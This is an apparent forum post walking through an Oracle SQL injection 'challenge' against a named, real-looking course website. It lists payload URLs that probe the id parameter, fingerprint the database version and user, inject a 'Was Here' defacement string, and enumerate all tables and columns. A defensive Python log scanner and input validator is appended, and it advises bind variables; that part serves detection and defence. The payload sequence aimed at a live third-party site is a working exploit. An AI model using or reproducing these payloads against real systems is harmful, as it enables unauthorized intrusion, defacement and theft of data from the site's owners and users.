- Oracle-based SQLi Challenge by GrenXPaRTa
- Let's begin:
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44' more errors
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44'-- not balanced
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44--
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44 ORDER BY 1--
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44 ORDER BY 2-- more errors, seems 1 column
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT NULL FROM dual-- No columns shown, let's increase columns to 2
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT 'test',NULL FROM dual-- We saw test, it means column 1 is the vuln column
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT (SELECT banner FROM v$version WHERE rownum=1),NULL FROM dual-- We saw version Oracle Database 11g
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT USER,NULL FROM dual-- We saw user, let's get database
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT sys.database_name,NULL FROM dual--
- We saw the database name, let's use all at once. We can't use || and + (challenge rules), so let's use concat inside another concat
- concat(concat(1,2),2) like that. Let's get all: concat(concat(concat(concat(concat(concat('<font color=red>GrenXPaRTa Was Here</font><br>Version::',(SELECT banner FROM v$version WHERE rownum=1)),'<br>User::'),USER),'<br>Database::'),sys.database_name),'<br>')
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT concat(concat(concat(concat(concat(concat('GrenXPaRTa Was Here<br>Version::',(SELECT banner FROM v$version WHERE rownum=1)),'<br>User::'),USER),'<br>Database::'),sys.database_name),'<br>'),NULL FROM dual-- Let's get all tables
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT TABLE_NAME,NULL FROM all_tables-- We get many tables, let's get all columns
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT column_name,NULL FROM all_tab_columns-- We get all columns, now let's extract for a table
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT column_name,NULL FROM all_tab_columns WHERE TABLE_NAME='AADATOSTRAZA'--
- Thanks to all Friend Member SQL Injection
- ✍🏻✍🏻✍🏻
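
A defender's view of the requests above, as an added example that is not part of the paste: every payload in the walk-through puts non-digit characters into `idc`, so an allow-list check rejects all of them, and the rejected values carry Oracle-specific markers worth alerting on in web logs. The log lines, client addresses, marker names and the 1 to 9 digit id format are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers taken from the probes in the write-up (several are Oracle-specific).
MARKERS = {
    "quote_or_comment": re.compile(r"'|--"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "oracle_dual": re.compile(r"\bfrom\s+dual\b", re.I),
    "oracle_catalog": re.compile(
        r"v\$version|\ball_tables\b|\ball_tab_columns\b|sys\.database_name", re.I),
    "nested_concat": re.compile(r"concat\s*\(\s*concat\s*\(", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def idc_is_valid(value):
    """Allow-list check (assumed format): 1 to 9 ASCII digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,9}", value) is not None

def classify(target, param="idc"):
    """Return (accepted, marker names) for the URL-decoded value of `param`."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [""])
    value = values[-1]  # PHP keeps the last value when a parameter repeats
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(value))
    return idc_is_valid(value), hits

def scan(log_lines):
    """Return (client, markers) for every logged request whose idc is rejected."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        ok, hits = classify(m.group(1))
        if not ok:
            findings.append((line.split()[0], hits))
    return findings

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cursos/detalle-curso-vista.php?idc=44 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cursos/detalle-curso-vista.php?idc=44%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cursos/detalle-curso-vista.php?idc=44%20ORDER%20BY%202-- HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:20 +0000] "GET /cursos/detalle-curso-vista.php?idc=-44%20UNION%20SELECT%20USER,NULL%20FROM%20dual-- HTTP/1.1" 200 5301',
    '198.51.100.7 - - [01/Jan/2024:10:00:31 +0000] "GET /cursos/detalle-curso-vista.php?idc=-44%20UNION%20SELECT%20column_name,NULL%20FROM%20all_tab_columns-- HTTP/1.1" 200 90211',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

This check is an input-validation and detection layer; the root fix is to pass `idc` to the Oracle query as a bind variable instead of concatenating it into the SQL text.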